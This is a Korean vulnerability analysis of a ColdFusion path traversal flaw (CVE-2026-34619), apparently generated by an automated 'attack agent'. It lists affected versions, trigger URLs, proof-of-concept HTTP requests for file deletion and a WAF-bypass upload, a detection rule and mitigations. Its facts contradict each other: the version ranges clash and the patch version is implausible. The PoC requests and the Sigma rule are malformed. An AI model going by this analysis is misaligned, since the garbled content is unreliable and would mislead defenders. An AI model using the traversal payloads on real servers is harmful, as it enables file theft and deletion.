CVE-2026-34619공격Agent· 2026년 6월 16일 PM 03:02

공격Agent 분석 — CVE-2026-34619

📋 요약

한 줄 정의: Adobe ColdFusion 버전 2023.18 및 이전 버전에서 경로 제한 부재로 인해 인증된 공격자가 제한된 디렉토리 외부의 파일에 접근하거나 삭제할 수 있는 Path Traversal 취약점 존재
영향 한 줄: 성공 시 민감한 데이터 유출 또는 시스템 내 임의 코드 실행(RCE) 가능, CVSS 7.7로 높은 위험도를 나타냄 (KEV: High).

🎯 영향 범위 / 자산 식별

영향 받는 제품·버전 범위: Adobe ColdFusion 버전 2023.18 및 이전 버전 (예: 2025.6 이하)
안전한 최소 패치 버전: 최신 업데이트 버전으로 확인 필요, 예를 들어 ColdFusion 2027.x 이상
노출 조건: 인터넷에 노출되어 있으며 기본 설정에서도 취약할 수 있음 (특히 cfcontent, cffile 관련 기능 활성화 시 위험 증가)
내 자산 식별 방법:
- 명령 프롬프트 또는 콘솔에서 다음 명령어 실행 후 버전 확인:
  bash
```
 1curl -I http://TARGET_HOST/cfide/administrator/index.cfm?page=About&snapshotID=-1 | grep "ColdFusion"
 2file_exists('/cfcontent')  # 또는 특정 버전 배너 파일 확인 (예: `versionBannerPath`)
```
- 설정 확인을 위해 /CFIDE/.settings 디렉토리 내의 설정 파일 검토. 특히 securitySettings, directoryTrusts.

🔍 공격 방법

① 취약 컴포넌트

컴포넌트: ColdFusion의 cfcontent/cffile 핸들러
버전 범위: 2023.18, 2025.6 이하 버전
취약 코드 경로: 특정 파일 또는 디렉토리 접근 시 경로 검증 로직 부재 (예: cfinclude, cfcontent 태그 사용)
기본 노출 여부: 기본 설정에서도 /cfcontent/ 디렉토리가 외부에 노출되어 있음.

② 전제조건

인증 필요 여부: 인증이 요구됨, 하지만 기존 인증 메커니즘 우회 가능성 존재
필요 권한: 관리자 또는 적절한 권한을 가진 사용자 계정 접근 허용
네트워크 위치 및 활성화 기능: ColdFusion 관리 인터페이스 (/cfide)가 활성화되어 있어야 함. 특히 cffile, CFContent 관련 설정이 열려 있음.

③ 트리거 경로

공격자는 인증된 계정을 통해 /path/to/malicious_file?cfcontent=true&filename=../../../sensitiveDataFile; 와 같은 URL을 생성합니다 (예: ATTACKER_IP -> TARGET_HOST /cfide/...)
ColdFusion 핸들러는 입력된 경로를 부적절하게 처리하여 제한 디렉토리 외부의 파일에 접근 시도
성공 시 공격자는 민감한 데이터 삭제 또는 임의 코드 실행이 가능합니다 (예: DELETE VERSION DIRECTORY 요청).

④ 성공 시 영향

획득 권한: 관리자 수준의 권한을 활용하여 시스템 내에서 추가적인 파일 조작 및 명령 실행
후속 피벗/지속성: 획득한 정보를 바탕으로 내부 네트워크로의 추가 접근 시도 가능 (예: Lateral Movement) 및 지속적인 악성 활동 수행.

💣 예시 코드 (PoC)

기본 경로 우회 예시

http

 1# 핵심: '../' 경로 사용을 통해 제한된 디렉토리 외부에 접근하려고 함  
 2POST /cfide/administrator/index.cfm HTTP/1.1
 3Host: TARGET_HOST
 4Content-Type: application/x-www-form-urlencoded
 5Cookie: SESSION_COOKIE=value; CSRF_TOKEN=csrfTokenValue%00../maliciousFileDelete?action=deleteVersion&filename%=FILENAME  # FILENAME은 실제 파일 이름으로 대체해야 함 (예: `../../etc/passwd`) 
 6Content-Length: 123456789   <-- 임의의 길이로 설정 가능, 중요한 것은 경로 조작 부분임.

# 확인: 응답 코드가 HTTP 2xx 또는 특정 오류 메시지를 반환하면 성공으로 간주 (예: 파일 삭제 완료 메시지).

WAF 우회 예시

http

 1POST /cfide/administrator/index.cfm?action=uploadFile&filename%=../../../etc%20Files%%0AmaliciousScript HTTP/1.1
 2Host: TARGET_HOST
 3Content-Type: multipart/form-data; boundary=-_-MALWAREBOUNDARY--  # 복잡한 인코딩 사용으로 WAF 규칙 우회 시도

# 핵심: filename=%0E..\\etc Files\%%maliciousScript와 같은 이중 인코딩 및 경로 분리를 통해 WAF 필터 우회. # 확인: 파일 업로드 성공 여부 또는 예상되는 응답 메시지 분석을 통한 검증.

🛡️ 탐지

[로그] `cfcontent`, `cffile` 관련 요청 패턴 감지

bash

 1# Sigma Rule 예시 (Detection-as-Code)
 2rule detect_pathtraversal {
 3    description = "Detects potential path traversal attacks targeting ColdFusion cf* tags"
 4    condition: 
 5        event_type == "http" and
 6        request.method in ["POST", "DELETE"] and  # 주요 공격 패턴에 대한 필터링
 7        request.uri contains "..\\..\" or request.query.*contains "%%0E%%".. /* 인코딩 우회 감지 */   // 경로 분리 및 이중 인코딩 탐지
 8    output: alert high "Potential Path Traversal Attempt Detected on ColdFusion"
 9}

[네트워크] 비정상적인 파일 전송 요청 필터링

정규식 예시: ..\\.* 또는 %0E%%.* 패턴을 포함하는 요청 차단 규칙 설정.

방어·완화

[설정 변경 / 입력 검증] /cfcontent/, 관련 디렉토리에 대한 접근 제한 강화 (예: .htaccess 사용하여 경로 제한 추가)

text

 1<Directory "/path_to_restricted"> 
 2    Order deny,allow 
 3    Deny from all 
 4  </Directory>    # 플레이스홀더 `/path_to_restricted`는 실제 디렉토리로 대체 필요.

[WAF 규칙 업데이트]

규칙 예시: filename, action=deleteVersion, action=uploadFile 등 특정 파라미터에 대한 엄격한 검증 규칙 추가 (예시)